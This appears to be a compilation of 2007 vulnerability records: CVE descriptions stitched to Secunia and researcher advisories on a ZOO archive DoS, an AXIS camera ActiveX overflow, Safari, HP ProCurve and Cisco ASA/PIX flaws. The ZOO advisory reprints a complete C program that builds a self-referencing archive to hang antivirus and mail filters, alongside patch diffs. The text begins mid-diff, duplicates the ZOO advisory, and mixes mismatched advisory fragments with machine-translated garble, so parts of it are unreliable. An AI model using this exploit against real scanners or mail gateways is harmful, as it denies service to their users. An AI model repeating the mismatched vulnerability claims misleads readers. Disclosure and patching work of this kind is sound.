%s.\n"; static char no_space[] = "Insufficient disk space to extract %s.\n"; @@ -169,6 +170,9 @@ exit_status = 1; } zooseek (zoo_file, zoo_header.zoo_start, 0); /* seek to where data begins */ + + /* Begin tracking our position in the file */ + zoo_pointer = zoo_header.zoo_start; } #ifndef PORTABLE @@ -597,6 +601,12 @@ } /* end if */ loop_again: + + /* Make sure we are not seeking to already processed data */ + if (next_ptr <= zoo_pointer) + prterror ('f', "ZOO chain structure is corrupted\n"); + zoo_pointer = next_ptr; + zooseek (zoo_file, next_ptr, 0); /* ..seek to next dir entry */ } /* end while */ diff -u zoo/zoolist.c zoo-patched/zoolist.c --- zoo/zoolist.c 1991-07-11 15:08:04.000000000 -0400 +++ zoo-patched/zoolist.c 2007-03-16 16:45:20.000000000 -0500 @@ -92,6 +92,7 @@ int show_mode = 0; /* show file protection */ #endif int first_dir = 1; /* if first direntry -- to adjust dat_ofs */ +unsigned long zoo_pointer = 0; /* Track our position in the file */ while (*option) { switch (*option) { @@ -211,6 +212,9 @@ show_acmt (&zoo_header, zoo_file, 0); /* show archive comment */ } + /* Begin tracking our position in the file */ + zoo_pointer = zoo_header.zoo_start; + /* Seek to the beginning of the first directory entry */ if (zooseek (zoo_file, zoo_header.zoo_start, 0) != 0) { ercount++; @@ -437,6 +441,11 @@ if (verb_list && !fast) show_comment (&direntry, zoo_file, 0, (char *) NULL); } /* end if (lots of conditions) */ + + /* Make sure we are not seeking to already processed data */ + if (direntry.next <= zoo_pointer) + prterror ('f', "ZOO chain structure is corrupted\n"); + zoo_pointer = direntry.next; /* ..seek to next dir entry */ zooseek (zoo_file, direntry.next, 0); VIII. CREDITS Jean-Sebastien Guay-Leroux found the bug and wrote the exploit for it. IX. REFERENCES 1. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1669 2. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1670 3. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1671 4. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1672 5. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1673 X. HISTORY 2006-09-?? : Vulnerability is found 2007-03-19 : All vendors notified 2007-03-19 : Barracuda Networks provided a fix 2007-03-22 : Avira provided a fix 2007-04-02 : Panda Antivirus provided a fix 2007-04-14 : avast! antivirus provided a fix 2007-05-04 : Public disclosure

zoo decoder 2.10 (zoo-2.10), as used in multiple products including (1) Barracuda Spam Firewall 3.4 and later with virusdef before 2.0.6399, (2) Spam Firewall before 3.4 20070319 with virusdef before 2.0.6399o, and (3) AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file. (1) Barracuda Spam Firewall Or (2) Spam Firewall ,and (3) AMaViS Used in etc. The Zoo compression algorithm is prone to a remote denial-of-service vulnerability. This issue arises when applications implementing the Zoo algorithm process certain malformed archives. A successful attack can exhaust system resources and trigger a denial-of-service condition. This issue affects Zoo 2.10 and other applications implementing the vulnerable algorithm. ---------------------------------------------------------------------- Try a new way to discover vulnerabilities that ALREADY EXIST in your IT infrastructure. Join the FREE BETA test of the Network Software Inspector (NSI)! http://secunia.com/network_software_inspector/ The NSI enables you to INSPECT, DISCOVER, and DOCUMENT vulnerabilities in more than 4,000 different Windows applications. The vulnerability is caused due to an error in the handling of Zoo archives. This can be exploited to cause an infinite loop resulting in high CPU utilisation. SOLUTION: Update to firmware version 3.4 and virus definition 2.0.6399 or later. PROVIDED AND/OR DISCOVERED BY: Jean-Sebastien Guay-Leroux ORIGINAL ADVISORY: Barracuda Networks: http://www.barracudanetworks.com/ns/resources/tech_alert.php Jean-Sebastien Guay-Leroux: http://www.guay-leroux.com/projects/zoo-infinite-advisory.txt ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . Topic: Multiple vendors ZOO file decompression infinite loop DoS Announced: 2007-05-04 Credits: Jean-Sebastien Guay-Leroux Products: Multiple (see section III) Impact: DoS (99% CPU utilisation) CVE ID: CVE-2007-1669, CVE-2007-1670, CVE-2007-1671, CVE-2007-1672, CVE-2007-1673 I. BACKGROUND Zoo is a compression program and format developed by Rahul Dhesi in the mid 1980s. The format is based on the LZW compression algorithm and compressed files are identified by the .zoo file extension. II. The vulnerability lies in the algorithm used to locate the files inside the archive. Each file in a ZOO archive is identified by a direntry structure. Those structures are linked between themselves with a 'next' pointer. This pointer is in fact an offset from the beginning of the file, representing the next direntry structure. By specifying an already processed file, it's possible to process more than one time this same file. The ZOO parser will then enter an infinite loop condition. III. AFFECTED SOFTWARES o Barracuda Spam Firewall o Panda Software Antivirus o avast! antivirus o Avira AntiVir o zoo-2.10 o unzoo.c o WinAce o PicoZip IV. IMPACT If this attack is conducted against a vulnerable antivirus, the host system will have its CPU at 100% utilization and may have problems answering other requests. If this attack is conducted against an SMTP content filter running a vulnerable ZOO implementation, legitimate clients may be unable to send and receive email through this server. V. SOLUTION o Barracuda Spam Firewall - CVE-2007-1669: They fixed this problem in virusdef 2.0.6399 for firmware >= 3.4 and 2.0.6399o for firmware < 3.4 March 19th 2007. o Panda Software Antivirus - CVE-2007-1670: They fixed this problem April 2nd 2007. o avast! antivirus - CVE-2007-1672: They fixed this problem in version 4.7.981, April 14th 2007. o Avira AntiVir - CVE-2007-1671: They fixed this problem in avpack32.dll version 7.3.0.6 March 22th 2007. o zoo-2.10 - CVE-2007-1669: This software is not maintained anymore. A patch for version 2.10 is provided in section VII of this advisory because some SMTP content filters may still use this software. o unzoo.c - CVE-2007-1673: This software is not maintained anymore. No patch is provided for this software. o WinAce was contacted but no response was received from them. o PicoZip was contacted but no response was received from them. VI. PROOF OF CONCEPT Using the PIRANA framework version 0.3.3, available at http://www.guay-leroux.com , it is possible to test your SMTP server against this vulnerability. Alternatively, here is an exploit that will create a file that will trigger the infinite loop condition when it is processed. /* Exploit for the vulnerability: Multiple vendors ZOO file decompression infinite loop DoS coded by Jean-S\xe9bastien Guay-Leroux September 2006 */ #include <stdio.h> #include <stdlib.h> #include <string.h> // Structure of a ZOO header #define ZOO_HEADER_SIZE 0x0000002a #define ZH_TEXT 0 #define ZH_TAG 20 #define ZH_START_OFFSET 24 #define ZH_NEG_START_OFFSET 28 #define ZH_MAJ_VER 32 #define ZH_MIN_VER 33 #define ZH_ARC_HTYPE 34 #define ZH_ARC_COMMENT 35 #define ZH_ARC_COMMENT_LENGTH 39 #define ZH_VERSION_DATA 41 #define D_DIRENTRY_LENGTH 56 #define D_TAG 0 #define D_TYPE 4 #define D_PACKING_METHOD 5 #define D_NEXT_ENTRY 6 #define D_OFFSET 10 #define D_DATE 14 #define D_TIME 16 #define D_FILE_CRC 18 #define D_ORIGINAL_SIZE 20 #define D_SIZE_NOW 24 #define D_MAJ_VER 28 #define D_MIN_VER 29 #define D_DELETED 30 #define D_FILE_STRUCT 31 #define D_COMMENT_OFFSET 32 #define D_COMMENT_SIZE 36 #define D_FILENAME 38 #define D_VAR_DIR_LEN 51 #define D_TIMEZONE 53 #define D_DIR_CRC 54 #define D_NAMLEN ( D_DIRENTRY_LENGTH + 0 ) #define D_DIRLEN ( D_DIRENTRY_LENGTH + 1 ) #define D_LFILENAME ( D_DIRENTRY_LENGTH + 2 ) void put_byte (char *ptr, unsigned char data) { *ptr = data; } void put_word (char *ptr, unsigned short data) { put_byte (ptr, data); put_byte (ptr + 1, data >> 8); } void put_longword (char *ptr, unsigned long data) { put_byte (ptr, data); put_byte (ptr + 1, data >> 8); put_byte (ptr + 2, data >> 16); put_byte (ptr + 3, data >> 24); } FILE * open_file (char *filename) { FILE *fp; fp = fopen ( filename , "w" ); if (!fp) { perror ("Cant open file"); exit (1); } return fp; } void usage (char *progname) { printf ("\nTo use:\n"); printf ("%s <archive name>\n\n", progname); exit (1); } int main (int argc, char *argv[]) { FILE *fp; char *hdr = (char *) malloc (4096); char *filename = (char *) malloc (256); int written_bytes; int total_size; if ( argc != 2) { usage ( argv[0] ); } strncpy (filename, argv[1], 255); if (!hdr || !filename) { perror ("Error allocating memory"); exit (1); } memset (hdr, 0x00, 4096); // Build a ZOO header memcpy (hdr + ZH_TEXT, "ZOO 2.10 Archive.\032", 18); put_longword (hdr + ZH_TAG, 0xfdc4a7dc); put_longword (hdr + ZH_START_OFFSET, ZOO_HEADER_SIZE); put_longword (hdr + ZH_NEG_START_OFFSET, (ZOO_HEADER_SIZE) * -1); put_byte (hdr + ZH_MAJ_VER, 2); put_byte (hdr + ZH_MIN_VER, 0); put_byte (hdr + ZH_ARC_HTYPE, 1); put_longword (hdr + ZH_ARC_COMMENT, 0); put_word (hdr + ZH_ARC_COMMENT_LENGTH, 0); put_byte (hdr + ZH_VERSION_DATA, 3); // Build vulnerable direntry struct put_longword (hdr + ZOO_HEADER_SIZE + D_TAG, 0xfdc4a7dc); put_byte (hdr + ZOO_HEADER_SIZE + D_TYPE, 1); put_byte (hdr + ZOO_HEADER_SIZE + D_PACKING_METHOD, 0); put_longword (hdr + ZOO_HEADER_SIZE + D_NEXT_ENTRY, 0x2a); put_longword (hdr + ZOO_HEADER_SIZE + D_OFFSET, 0x71); put_word (hdr + ZOO_HEADER_SIZE + D_DATE, 0x3394); put_word (hdr + ZOO_HEADER_SIZE + D_TIME, 0x4650); put_word (hdr + ZOO_HEADER_SIZE + D_FILE_CRC, 0); put_longword (hdr + ZOO_HEADER_SIZE + D_ORIGINAL_SIZE, 0); put_longword (hdr + ZOO_HEADER_SIZE + D_SIZE_NOW, 0); put_byte (hdr + ZOO_HEADER_SIZE + D_MAJ_VER, 1); put_byte (hdr + ZOO_HEADER_SIZE + D_MIN_VER, 0); put_byte (hdr + ZOO_HEADER_SIZE + D_DELETED, 0); put_byte (hdr + ZOO_HEADER_SIZE + D_FILE_STRUCT, 0); put_longword (hdr + ZOO_HEADER_SIZE + D_COMMENT_OFFSET, 0); put_word (hdr + ZOO_HEADER_SIZE + D_COMMENT_SIZE, 0); memcpy (hdr + ZOO_HEADER_SIZE + D_FILENAME, "AAAAAAAA.AAA", 13); total_size = ZOO_HEADER_SIZE + 51; fp = open_file (filename); if ( (written_bytes = fwrite ( hdr, 1, total_size, fp)) != 0 ) { printf ("The file has been written\n"); } else { printf ("Cant write to the file\n"); exit (1); } fclose (fp); return 0; } VII. PATCH To fix this issue, ensure that the offset of the next file to process is always greater than the one you are currently processing. This will guarantee the fact that it's not possible to process the same files over and over again. Here is a patch for the software zoo version 2.10 distributed with many UNIX systems: diff -u zoo/zooext.c zoo-patched/zooext.c --- zoo/zooext.c 1991-07-11 15:08:00.000000000 -0400 +++ zoo-patched/zooext.c 2007-03-16 16:45:28.000000000 -0500 @@ -89,6 +89,7 @@ #endif struct direntry direntry; /* directory entry */ int first_dir = 1; /* first dir entry seen? */ +unsigned long zoo_pointer = 0; /* Track our position in the file */ static char extract_ver[] = "Zoo %d.%d is needed to extract %s.\n"; static char no_space[] = "Insufficient disk space to extract %s.\n"; @@ -169,6 +170,9 @@ exit_status = 1; } zooseek (zoo_file, zoo_header.zoo_start, 0); /* seek to where data begins */ + + /* Begin tracking our position in the file */ + zoo_pointer = zoo_header.zoo_start; } #ifndef PORTABLE @@ -597,6 +601,12 @@ } /* end if */ loop_again: + + /* Make sure we are not seeking to already processed data */ + if (next_ptr <= zoo_pointer) + prterror ('f', "ZOO chain structure is corrupted\n"); + zoo_pointer = next_ptr; + zooseek (zoo_file, next_ptr, 0); /* ..seek to next dir entry */ } /* end while */ diff -u zoo/zoolist.c zoo-patched/zoolist.c --- zoo/zoolist.c 1991-07-11 15:08:04.000000000 -0400 +++ zoo-patched/zoolist.c 2007-03-16 16:45:20.000000000 -0500 @@ -92,6 +92,7 @@ int show_mode = 0; /* show file protection */ #endif int first_dir = 1; /* if first direntry -- to adjust dat_ofs */ +unsigned long zoo_pointer = 0; /* Track our position in the file */ while (*option) { switch (*option) { @@ -211,6 +212,9 @@ show_acmt (&zoo_header, zoo_file, 0); /* show archive comment */ } + /* Begin tracking our position in the file */ + zoo_pointer = zoo_header.zoo_start; + /* Seek to the beginning of the first directory entry */ if (zooseek (zoo_file, zoo_header.zoo_start, 0) != 0) { ercount++; @@ -437,6 +441,11 @@ if (verb_list && !fast) show_comment (&direntry, zoo_file, 0, (char *) NULL); } /* end if (lots of conditions) */ + + /* Make sure we are not seeking to already processed data */ + if (direntry.next <= zoo_pointer) + prterror ('f', "ZOO chain structure is corrupted\n"); + zoo_pointer = direntry.next; /* ..seek to next dir entry */ zooseek (zoo_file, direntry.next, 0); VIII. CREDITS Jean-Sebastien Guay-Leroux found the bug and wrote the exploit for it. IX. REFERENCES 1. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1669 2. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1670 3. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1671 4. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1672 5. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1673 X. HISTORY 2006-09-?? : Vulnerability is found 2007-03-19 : All vendors notified 2007-03-19 : Barracuda Networks provided a fix 2007-03-22 : Avira provided a fix 2007-04-02 : Panda Antivirus provided a fix 2007-04-14 : avast! antivirus provided a fix 2007-05-04 : Public disclosure

Stack-based buffer overflow in the SaveBMP method in the AXIS Camera Control (aka CamImage) ActiveX control before 2.40.0.0 in AxisCamControl.ocx in AXIS 2100, 2110, 2120, 2130 PTZ, 2420, 2420-IR, 2400, 2400+, 2401, 2401+, 2411, and Panorama PTZ allows remote attackers to cause a denial of service (Internet Explorer crash) or execute arbitrary code via a long argument. Axis Camera Control is prone to a buffer-overflow vulnerability because it fails to sufficiently bounds-check user-supplied input before copying it to an insufficiently sized memory buffer. Axis Camera Control versions prior to 2.40.0.0 are vulnerable to this issue. ---------------------------------------------------------------------- Try a new way to discover vulnerabilities that ALREADY EXIST in your IT infrastructure. Join the FREE BETA test of the Network Software Inspector (NSI)! http://secunia.com/network_software_inspector/ The NSI enables you to INSPECT, DISCOVER, and DOCUMENT vulnerabilities in more than 4,000 different Windows applications. The vulnerability is caused due to a boundary error when handling the "SaveBMP()" method and can be exploited to cause a stack-based buffer overflow via an overly long argument. Successful exploitation allows execution of arbitrary code. SOLUTION: Update to version 2.40.0.0 or later. http://www.axis.com/techsup/software/acc/files/AXISCameraControl.zip PROVIDED AND/OR DISCOVERED BY: Will Dormann, CERT/CC. ORIGINAL ADVISORY: Axis Communications: http://www.axis.com/techsup/software/acc/files/acc_security_update_1_00.pdf US-CERT VU#355809: http://www.kb.cert.org/vuls/id/355809 ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Unspecified vulnerability in Apple Safari allows local users to obtain sensitive information (saved keychain passwords) via the document.loginform.password.value JavaScript parameter loaded from an AppleScript script. Apple Safari is prone to an unspecified local vulnerability. Few technical details are currently available. We will update this BID as more information emerges

Unspecified vulnerability in HP ProCurve 9300m Series switches with software 08.0.01c through 08.0.01j allows remote attackers to cause a denial of service via unknown vectors, a different switch series than CVE-2006-4015. This vulnerability CVE-2006-4015 It is a vulnerability of a different switch series.Service disruption by a third party (DoS) There is a possibility of being put into a state. This issue most likely occurs because the device fails to properly sanitize user-supplied input. An attacker can exploit this issue to crash an affected device, effectively denying service to legitimate users. This issue affects HP ProCurve 9300m Switches running software versions 08.0.01c to 08.0.01j. ---------------------------------------------------------------------- Try a new way to discover vulnerabilities that ALREADY EXIST in your IT infrastructure. Join the FREE BETA test of the Network Software Inspector (NSI)! http://secunia.com/network_software_inspector/ The NSI enables you to INSPECT, DISCOVER, and DOCUMENT vulnerabilities in more than 4,000 different Windows applications. The vulnerability is caused due to an unspecified error, which can be exploited to cause a DoS. No more information is currently available. The vulnerability is reported in versions 8.0.01c \x96 08.0.01j. SOLUTION: Install software version 07.8.03. http://www.hp.com/rnd/software/switches.htm PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01034753 ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

The DHCP relay agent in Cisco Adaptive Security Appliance (ASA) and PIX 7.2 allows remote attackers to cause a denial of service (dropped packets) via a DHCPREQUEST or DHCPINFORM message that causes multiple DHCPACK messages to be sent from DHCP servers to the agent, which consumes the memory allocated for a local buffer. NOTE: this issue only occurs when multiple DHCP servers are used. The Cisco ASA and PIX firewalls contain an authentication bypass vulnerability. This vulnerability may allow a remote attacker to gain unauthorized access to the internal network or firewall. Cisco PIX and ASA are prone to a remote denial-of-service vulnerability because the software fails to properly handle DHCP packets in certain circumstances. Successfully exploiting this issue allows attackers with access to a LAN served by a vulnerable device to consume excessive memory resources. This will eventually cause the device to stop forwarding further packets, denying service to legitimate users. This issue is being tracked by Cisco Bug ID CSCsh50277. PIX is a firewall device that provides policy enforcement, multi-vector attack protection and secure connection services for users and applications; Adaptive Security Appliance (ASA) is a modular platform that provides security and VPN services. If a DHCPACK message is received from multiple DHCP servers in response to a DHCPREQUEST or DHCPINFORM message from a DHCP client, it may result in a block memory consumption of 1550 bytes. Once the 1550-byte block memory is completely consumed, the device will start to drop packets, making it impossible to forward packets. ---------------------------------------------------------------------- Try a new way to discover vulnerabilities that ALREADY EXIST in your IT infrastructure. Join the FREE BETA test of the Network Software Inspector (NSI)! http://secunia.com/network_software_inspector/ The NSI enables you to INSPECT, DISCOVER, and DOCUMENT vulnerabilities in more than 4,000 different Windows applications. ---------------------------------------------------------------------- TITLE: Cisco PIX and ASA Denial of Service and Security Bypass SECUNIA ADVISORY ID: SA25109 VERIFY ADVISORY: http://secunia.com/advisories/25109/ CRITICAL: Moderately critical IMPACT: Security Bypass, DoS WHERE: >From remote OPERATING SYSTEM: Cisco Adaptive Security Appliance (ASA) 7.x http://secunia.com/product/6115/ Cisco PIX 7.x http://secunia.com/product/6102/ DESCRIPTION: Some vulnerabilities have been reported in Cisco PIX and ASA, which can be exploited by malicious people to bypass certain security restrictions or cause a DoS (Denial of Service). 1) An unspecified error exists when using the LDAP authentication mechanism, which can be exploited to bypass the authentication and gain access to the device or the network. Successful exploitation requires that the device uses the Layer 2 Tunneling Protocol (L2TP) and is configured to use LDAP servers with another protocol other than PAP for authentication, or that the device offers remote management access (telnet, SSH, HTTP) and uses an LDAP AAA server for authentication. 2) An unspecified error when using VPN connections configured with password expiry can be exploited to cause a DoS. Successful exploitation requires that the tunnel group is configured with password expiry. In order to exploit this in IPSec VPN connections, an attacker also needs to know the group name and group password. 3) A race condition within the processing of non-standard SSL sessions in the SSL VPN server of Cisco ASA appliances can be exploited to cause the device to reload. Successful exploitation requires that clientless SSL is used. Successful exploitation requires that devices are configured to use the DHCP relay agent. SOLUTION: Apply updated software versions. Please see vendor advisories for details. PROVIDED AND/OR DISCOVERED BY: 1-3) Reported by the vendor. 4) Lisa Sittler and Grant Deffenbaugh, CERT/CC. ORIGINAL ADVISORY: Cisco: http://www.cisco.com/warp/public/707/cisco-sa-20070502-asa.shtml http://www.cisco.com/warp/public/707/cisco-sr-20070502-pix.shtml http://www.cisco.com/en/US/products/products_security_response09186a0080833172.html http://www.cisco.com/en/US/products/products_applied_intelligence_response09186a008083316f.html US-CERT VU#530057: http://www.kb.cert.org/vuls/id/530057 OTHER REFERENCES: US-CERT VU#210876: http://www.kb.cert.org/vuls/id/210876 ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Unspecified vulnerability in Cisco Adaptive Security Appliance (ASA) and PIX 7.1 before 7.1(2)49 and 7.2 before 7.2(2)17 allows remote attackers to cause a denial of service (device reload) via unknown vectors related to VPN connection termination and password expiry. The Cisco ASA and PIX firewalls contain an authentication bypass vulnerability. This vulnerability may allow a remote attacker to gain unauthorized access to the internal network or firewall. The Cisco Adaptive Security Appliance contains a memory exhaustion vulnerability that may occur when the DHCP service relay is enabled. According to Cisco Systems information IPSec VPN If an attacker attempts to exploit the, the group name and group password must be known. Remote attackers may use this vulnerability to cause the device to fail to work normally or to bypass authentication. A successful attack can result in a device reload. This vulnerability is documented as software bug CSCsh81111. ---------------------------------------------------------------------- Try a new way to discover vulnerabilities that ALREADY EXIST in your IT infrastructure. Join the FREE BETA test of the Network Software Inspector (NSI)! http://secunia.com/network_software_inspector/ The NSI enables you to INSPECT, DISCOVER, and DOCUMENT vulnerabilities in more than 4,000 different Windows applications. 1) An unspecified error exists when using the LDAP authentication mechanism, which can be exploited to bypass the authentication and gain access to the device or the network. Successful exploitation requires that the device uses the Layer 2 Tunneling Protocol (L2TP) and is configured to use LDAP servers with another protocol other than PAP for authentication, or that the device offers remote management access (telnet, SSH, HTTP) and uses an LDAP AAA server for authentication. 2) An unspecified error when using VPN connections configured with password expiry can be exploited to cause a DoS. Successful exploitation requires that the tunnel group is configured with password expiry. 3) A race condition within the processing of non-standard SSL sessions in the SSL VPN server of Cisco ASA appliances can be exploited to cause the device to reload. Successful exploitation requires that clientless SSL is used. 4) An error within the DHCP relay agent when handling DHCPACK messages can be exploited to cause a DoS due to memory exhaustion by sending a large number of DHCP requests to a vulnerable device. Successful exploitation requires that devices are configured to use the DHCP relay agent. SOLUTION: Apply updated software versions. Please see vendor advisories for details. PROVIDED AND/OR DISCOVERED BY: 1-3) Reported by the vendor. 4) Lisa Sittler and Grant Deffenbaugh, CERT/CC. ORIGINAL ADVISORY: Cisco: http://www.cisco.com/warp/public/707/cisco-sa-20070502-asa.shtml http://www.cisco.com/warp/public/707/cisco-sr-20070502-pix.shtml http://www.cisco.com/en/US/products/products_security_response09186a0080833172.html http://www.cisco.com/en/US/products/products_applied_intelligence_response09186a008083316f.html US-CERT VU#530057: http://www.kb.cert.org/vuls/id/530057 OTHER REFERENCES: US-CERT VU#210876: http://www.kb.cert.org/vuls/id/210876 ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Unspecified vulnerability in Cisco Adaptive Security Appliance (ASA) and PIX 7.2 before 7.2(2)8, when using Layer 2 Tunneling Protocol (L2TP) or Remote Management Access, allows remote attackers to bypass LDAP authentication and gain privileges via unknown vectors. The Cisco ASA and PIX firewalls contain an authentication bypass vulnerability. This vulnerability may allow a remote attacker to gain unauthorized access to the internal network or firewall. The Cisco Adaptive Security Appliance contains a memory exhaustion vulnerability that may occur when the DHCP service relay is enabled. According to Cisco Systems information LDAP With authentication PAP (Password Authentication Protocol) There is no effect if is set to use.To a third party LDAP Authentication can be bypassed and unauthorized access to the appliance and internal resources can occur. PIX is a firewall device that provides policy enforcement, multi-vector attack protection and secure connection services for users and applications; Adaptive Security Appliance (ASA) is a modular platform that provides security and VPN services. Remote attackers may use this vulnerability to cause the device to fail to work normally or to bypass authentication. Access to the management session must be explicitly enabled in the device configuration and restricted to defined IP addresses only. This vulnerability is documented in Cisco Bug ID as CSCsh42793. ---------------------------------------------------------------------- Try a new way to discover vulnerabilities that ALREADY EXIST in your IT infrastructure. Join the FREE BETA test of the Network Software Inspector (NSI)! http://secunia.com/network_software_inspector/ The NSI enables you to INSPECT, DISCOVER, and DOCUMENT vulnerabilities in more than 4,000 different Windows applications. 2) An unspecified error when using VPN connections configured with password expiry can be exploited to cause a DoS. Successful exploitation requires that the tunnel group is configured with password expiry. In order to exploit this in IPSec VPN connections, an attacker also needs to know the group name and group password. 3) A race condition within the processing of non-standard SSL sessions in the SSL VPN server of Cisco ASA appliances can be exploited to cause the device to reload. Successful exploitation requires that clientless SSL is used. 4) An error within the DHCP relay agent when handling DHCPACK messages can be exploited to cause a DoS due to memory exhaustion by sending a large number of DHCP requests to a vulnerable device. Successful exploitation requires that devices are configured to use the DHCP relay agent. SOLUTION: Apply updated software versions. Please see vendor advisories for details. PROVIDED AND/OR DISCOVERED BY: 1-3) Reported by the vendor. 4) Lisa Sittler and Grant Deffenbaugh, CERT/CC. ORIGINAL ADVISORY: Cisco: http://www.cisco.com/warp/public/707/cisco-sa-20070502-asa.shtml http://www.cisco.com/warp/public/707/cisco-sr-20070502-pix.shtml http://www.cisco.com/en/US/products/products_security_response09186a0080833172.html http://www.cisco.com/en/US/products/products_applied_intelligence_response09186a008083316f.html US-CERT VU#530057: http://www.kb.cert.org/vuls/id/530057 OTHER REFERENCES: US-CERT VU#210876: http://www.kb.cert.org/vuls/id/210876 ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Race condition in Cisco Adaptive Security Appliance (ASA) and PIX 7.1 before 7.1(2)49 and 7.2 before 7.2(2)19, when using "clientless SSL VPNs," allows remote attackers to cause a denial of service (device reload) via "non-standard SSL sessions.". The Cisco ASA and PIX firewalls contain an authentication bypass vulnerability. This vulnerability may allow a remote attacker to gain unauthorized access to the internal network or firewall. The Cisco Adaptive Security Appliance contains a memory exhaustion vulnerability that may occur when the DHCP service relay is enabled. Remote attackers may use this vulnerability to cause the device to fail to work normally or to bypass authentication. This vulnerability is documented as bug CSCsi16248. ---------------------------------------------------------------------- Try a new way to discover vulnerabilities that ALREADY EXIST in your IT infrastructure. Join the FREE BETA test of the Network Software Inspector (NSI)! http://secunia.com/network_software_inspector/ The NSI enables you to INSPECT, DISCOVER, and DOCUMENT vulnerabilities in more than 4,000 different Windows applications. 1) An unspecified error exists when using the LDAP authentication mechanism, which can be exploited to bypass the authentication and gain access to the device or the network. Successful exploitation requires that the device uses the Layer 2 Tunneling Protocol (L2TP) and is configured to use LDAP servers with another protocol other than PAP for authentication, or that the device offers remote management access (telnet, SSH, HTTP) and uses an LDAP AAA server for authentication. 2) An unspecified error when using VPN connections configured with password expiry can be exploited to cause a DoS. Successful exploitation requires that the tunnel group is configured with password expiry. In order to exploit this in IPSec VPN connections, an attacker also needs to know the group name and group password. Successful exploitation requires that clientless SSL is used. 4) An error within the DHCP relay agent when handling DHCPACK messages can be exploited to cause a DoS due to memory exhaustion by sending a large number of DHCP requests to a vulnerable device. Successful exploitation requires that devices are configured to use the DHCP relay agent. SOLUTION: Apply updated software versions. Please see vendor advisories for details. PROVIDED AND/OR DISCOVERED BY: 1-3) Reported by the vendor. 4) Lisa Sittler and Grant Deffenbaugh, CERT/CC. ORIGINAL ADVISORY: Cisco: http://www.cisco.com/warp/public/707/cisco-sa-20070502-asa.shtml http://www.cisco.com/warp/public/707/cisco-sr-20070502-pix.shtml http://www.cisco.com/en/US/products/products_security_response09186a0080833172.html http://www.cisco.com/en/US/products/products_applied_intelligence_response09186a008083316f.html US-CERT VU#530057: http://www.kb.cert.org/vuls/id/530057 OTHER REFERENCES: US-CERT VU#210876: http://www.kb.cert.org/vuls/id/210876 ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ 